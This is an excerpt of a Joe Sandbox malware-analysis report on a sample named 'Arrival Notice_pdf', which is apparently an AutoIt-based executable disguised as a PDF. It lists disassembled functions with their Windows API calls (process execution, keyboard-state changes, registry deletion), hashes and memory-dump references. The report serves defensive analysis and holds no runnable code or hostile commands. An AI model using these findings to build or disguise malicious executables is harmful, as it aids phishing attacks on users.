Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: b43fe71b5cdc9d8e422cfcc766d9cc0fede02ded271dce9ca342ecf755c7798a
Instruction ID: 36f1e241c2949270b0df008cc358e4bc977b9a3ac9010824ba817385a1c2868e
Opcode Fuzzy Hash: b43fe71b5cdc9d8e422cfcc766d9cc0fede02ded271dce9ca342ecf755c7798a
Instruction Fuzzy Hash: 45A18E3561061AEFDB19CF68C9C9BEEBBB1BF08780F148165EC54A7290D774AD60CB90

Function 0025AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9c468a114294bfad64b6279e5c7f39e0d533e5f020fbc3ff0ae50522e036378
Instruction ID: b03bd681936e26b00dafbde91c095b2b8fcf924ade838812476310a41df4d0c5
Opcode Fuzzy Hash: a9c468a114294bfad64b6279e5c7f39e0d533e5f020fbc3ff0ae50522e036378
Instruction Fuzzy Hash: C2717BB0910109EFCB14CF98CC8AAFEBB74FF85315F248259F915A6251C331AA65CFA5

Function 002A2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002A225A
_memset.LIBCMT ref: 002A2323
ShellExecuteExW.SHELL32(?), ref: 002A2368

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

Part of subcall function 0025C6F4: _wcscpy.LIBCMT ref: 0025C717

CloseHandle.KERNEL32(00000000), ref: 002A242F
FreeLibrary.KERNEL32(00000000), ref: 002A243E

Strings

@, xrefs: 002A2334

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: d363b22fda776c17a3a0a2056f47744d5fc80c64d20a3cfc6b33bf3979afcb2d
Instruction ID: c41e34cac7051e39b6b975f0cb33a5b104b94b95ff658924572f3bc5b87cd5a5
Opcode Fuzzy Hash: d363b22fda776c17a3a0a2056f47744d5fc80c64d20a3cfc6b33bf3979afcb2d
Instruction Fuzzy Hash: 6B716B70A20619DFCF14EFA8C88599EBBB5FF49710F108459E846AB391CB30AD64CF94

Function 00283DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00283DE7
GetKeyboardState.USER32(?), ref: 00283DFC
SetKeyboardState.USER32(?), ref: 00283E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00283E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00283EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00283EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00283F13

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 13ae26a69aef65ec4aba239d5f841dd59f2a364131c876ed8850795b8499dde5
Instruction ID: d6145b871ba4d82157fe2762f977be931f2f58f9fbd61ca42810b4faedf960c1
Opcode Fuzzy Hash: 13ae26a69aef65ec4aba239d5f841dd59f2a364131c876ed8850795b8499dde5
Instruction Fuzzy Hash: 4C5126646253C23EFB36AB348C09BB67EA95F06B04F084488F1D5468C3D3D8AEE4D750

Function 00283BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00283C02
GetKeyboardState.USER32(?), ref: 00283C17
SetKeyboardState.USER32(?), ref: 00283C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00283CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00283CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00283D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00283D26

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b648ed6d61ca85779ff1c56daba49b54cfe67d3585a56d9963307ecfac2d9a67
Instruction ID: 2085a20ac95d75c2ef57d82745a9fef52fca1dbd12b7cf32213cb8f6cc3a1124
Opcode Fuzzy Hash: b648ed6d61ca85779ff1c56daba49b54cfe67d3585a56d9963307ecfac2d9a67
Instruction Fuzzy Hash: 1A5149A45267D73DFB32EB34CC45B7ABF986B06B00F0C8489E0C55A8C2D294EEA4D750

Function 00287DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00287DBE
_wcsncpy.LIBCMT ref: 00287DF3
_wcsncpy.LIBCMT ref: 00287E25
_wcsncpy.LIBCMT ref: 00287E58
_wcsncpy.LIBCMT ref: 00287E9A
_wcsncpy.LIBCMT ref: 00287ED4
_wcsncpy.LIBCMT ref: 00287F03

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: bb584ee7e13d6d1a0be23015f87d019414a1ee200aa9fe6743f33f91970a79d1
Instruction ID: ac71ce5fc44b2f82a766c7a9342ae04985d7023417a230b8c51dffb84d04bdaa
Opcode Fuzzy Hash: bb584ee7e13d6d1a0be23015f87d019414a1ee200aa9fe6743f33f91970a79d1
Instruction Fuzzy Hash: 6A41736AC31214B6CB10EBF4C886ACFB3AC9F14310F5489A6E508E31A1F634E674C7A5

Function 002A3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 002A3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002A3DCB
FreeLibrary.KERNEL32(00000000), ref: 002A3E80

Part of subcall function 002A3D72: RegCloseKey.ADVAPI32(?), ref: 002A3DE8
Part of subcall function 002A3D72: FreeLibrary.KERNEL32(?), ref: 002A3E3A
Part of subcall function 002A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002A3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 002A3E25

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ee9832e32df68c28ea7f9acb48bcba7a4eac4f43e9d7fb565f913b6e2d7714f7
Instruction ID: ff753f3e61c75097ddee501875ddf6018648d25fde9adf49786855d912ccbfcb
Opcode Fuzzy Hash: ee9832e32df68c28ea7f9acb48bcba7a4eac4f43e9d7fb565f913b6e2d7714f7
Instruction Fuzzy Hash: 6631B9B1911109BFDB15DF94ED89EFFB7BCEF09300F00016AB512A2151DA749F599BA0

Function 002A8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002A8FE7
GetWindowLongW.USER32(00CDE300,000000F0), ref: 002A901A
GetWindowLongW.USER32(00CDE300,000000F0), ref: 002A904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002A9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002A90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 002A90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002A90D6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 328c8f7318e027942e762c71c34f9308b4adb770c707168de7131240f7684f31
Instruction ID: fc5b982c3ca3a28db77dc344f744812caf7d4b2fb691e0e2d2915ff26fdb7a2e
Opcode Fuzzy Hash: 328c8f7318e027942e762c71c34f9308b4adb770c707168de7131240f7684f31
Instruction Fuzzy Hash: 863135346102169FDB21CF59EC88F6477A9FB4A354F154165FA198B2B1CFB2A890CB40

Function 002808AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002808F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00280918
SysAllocString.OLEAUT32(00000000), ref: 0028091B
SysAllocString.OLEAUT32(?), ref: 00280939
SysFreeString.OLEAUT32(?), ref: 00280942
StringFromGUID2.OLE32(?,?,00000028), ref: 00280967
SysAllocString.OLEAUT32(?), ref: 00280975

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: dc95d0f3c1627a801dc0a41fe8929ec2198dc2263c272a96018ea596a516e4f1
Instruction ID: 5920a4888707d3dc829f41c40d9af19d7253ca89a863680d8da0c732c254fe38
Opcode Fuzzy Hash: dc95d0f3c1627a801dc0a41fe8929ec2198dc2263c272a96018ea596a516e4f1
Instruction Fuzzy Hash: 5C21B576611209AFAB50AF68DC88DAB73ACEB08760B008525F919DB191D670EC498B60

Function 00282472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00282485
__wcsnicmp.LIBCMT ref: 002824A6
__wcsnicmp.LIBCMT ref: 002824C0

Strings

#requireadmin, xrefs: 002824A0
#OnAutoItStartRegister, xrefs: 002824BA
#notrayicon, xrefs: 0028247D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 2c97df5afb185cc9835eb8ca00d4ecec6089b2c3d9cbb7bef572dc42dd1341b3
Instruction ID: 5aa4b9f6e574defd34d5f32c3bbd20ca4dfaab862f3d6d5b75e31b8805bb14c3
Opcode Fuzzy Hash: 2c97df5afb185cc9835eb8ca00d4ecec6089b2c3d9cbb7bef572dc42dd1341b3
Instruction Fuzzy Hash: 0B217C76172612F7D334BA348C12E777399EF65301FA08026F845A71C1E6A59DBAC3A4

Function 00280986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002809CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002809F1
SysAllocString.OLEAUT32(00000000), ref: 002809F4
SysAllocString.OLEAUT32 ref: 00280A15
SysFreeString.OLEAUT32 ref: 00280A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00280A38
SysAllocString.OLEAUT32(?), ref: 00280A46

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 360933a21aaf19b3e2499dd20e130084405d9f1fd512c98fff6fdb80f544deba
Instruction ID: 2364dae106a0336eeeb639fc0c5256f3db741ef7ee0d736bbd670dfebccf777f
Opcode Fuzzy Hash: 360933a21aaf19b3e2499dd20e130084405d9f1fd512c98fff6fdb80f544deba
Instruction Fuzzy Hash: FE217779211205AFDB54EFA8DCC8D7A77ECEF093607408135FA09CB1A1E670EC558B54

Function 002AA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
Part of subcall function 0025D17C: GetStockObject.GDI32(00000011), ref: 0025D1CE
Part of subcall function 0025D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002AA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002AA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002AA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002AA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002AA360

Strings

Msctls_Progress32, xrefs: 002AA2FE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 21ca4ef339de6a2539f556267b916fcc6c537e79525e1f9b62e5d4546d35e7bc
Instruction ID: 9f3b2f3ead2581577da0da1f2ea3ae1f647297afe409f10eabdc4296f1992fe1
Opcode Fuzzy Hash: 21ca4ef339de6a2539f556267b916fcc6c537e79525e1f9b62e5d4546d35e7bc
Instruction Fuzzy Hash: E7115EB1560219BFEF159F64CC85EEB7F6DEF09798F014115BA08A60A0CB729C21DBA4

Function 0025CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0025CCF6
GetWindowRect.USER32(?,?), ref: 0025CD37
ScreenToClient.USER32(?,?), ref: 0025CD5F
GetClientRect.USER32(?,?), ref: 0025CE8C
GetWindowRect.USER32(?,?), ref: 0025CEA5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 4b9aef85cbc52f420075901d0aa24327eacc0ca59fe2bcf1bdec760f710358c3
Instruction ID: 6016667210d21d020049b69e866717dd9dad67a700f2b5c1f3ced29e01cd89f2
Opcode Fuzzy Hash: 4b9aef85cbc52f420075901d0aa24327eacc0ca59fe2bcf1bdec760f710358c3
Instruction Fuzzy Hash: B1B1397992024ADFDF10CFA8C4857EDB7B1FF08340F259529EC59AB250EB70A964CB58

Function 002A1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 002A1C18
Process32FirstW.KERNEL32(00000000,?), ref: 002A1C26
__wsplitpath.LIBCMT ref: 002A1C54

Part of subcall function 00261DFC: __wsplitpath_helper.LIBCMT ref: 00261E3C

_wcscat.LIBCMT ref: 002A1C69
Process32NextW.KERNEL32(00000000,?), ref: 002A1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 002A1CF1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: e4677765380fc9325de08a73fd83740c72e20940dd4b097904379b09baef82db
Instruction ID: c2eda77ca0d30f23dca4acafa2a9232eed07d68df2a69b19f645630461e89967
Opcode Fuzzy Hash: e4677765380fc9325de08a73fd83740c72e20940dd4b097904379b09baef82db
Instruction Fuzzy Hash: 03518F711143409FD724EF24D885EABB7ECEF88754F00492EF98997291EB70E924CB92

Function 002A2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002A30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002A3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002A313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 002A317E
RegCloseKey.ADVAPI32(00000000), ref: 002A318B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: bba2263baa675a9459b92cdcf35609275d19d2448d00ac08adbffc0f3075c34f
Instruction ID: e72416a71f398970d4e67b2a83f5cc45b4cfea2c0e1b9e2ce39b41a5cf56cccf
Opcode Fuzzy Hash: bba2263baa675a9459b92cdcf35609275d19d2448d00ac08adbffc0f3075c34f
Instruction Fuzzy Hash: 84513831228300AFC704EF68C885E6ABBE9FF89304F14492DF555972A1DB71EA25CF52

Function 002A84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 002A8540
GetMenuItemCount.USER32(00000000), ref: 002A8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002A859F
GetMenuItemID.USER32(?,?), ref: 002A860E
GetSubMenu.USER32(?,?), ref: 002A861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 002A866D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 88b58e5a7b5aaad3ae698a60e7275da9d08e6aa204bd11457aeddeb5e87a76fe
Instruction ID: d31272d22928355b96d9fcb2cc0f6de7e06f5e68c414f08492f423643aa4aba3
Opcode Fuzzy Hash: 88b58e5a7b5aaad3ae698a60e7275da9d08e6aa204bd11457aeddeb5e87a76fe
Instruction Fuzzy Hash: AD51CB31E10225AFDB15EFA4C845AAEB7F8EF09710F1140A9E901BB381CF70AE508F90

Function 00284AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00284B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00284B5B
IsMenu.USER32(00000000), ref: 00284B7B
CreatePopupMenu.USER32 ref: 00284BAF
GetMenuItemCount.USER32(000000FF), ref: 00284C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00284C3E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3233d8dbad0bfb7178973738789270382765706aa1df0940aaa1528b89db0684
Instruction ID: 8934a54e9e8e123bbab8b378c8f61b26f1036d6038daac376ec393296da5e0aa
Opcode Fuzzy Hash: 3233d8dbad0bfb7178973738789270382765706aa1df0940aaa1528b89db0684
Instruction Fuzzy Hash: 8B51C378A1220BDBDF20FF64D888BADBBF8BF44318F14415AE4159B2D1D3B09964CB51

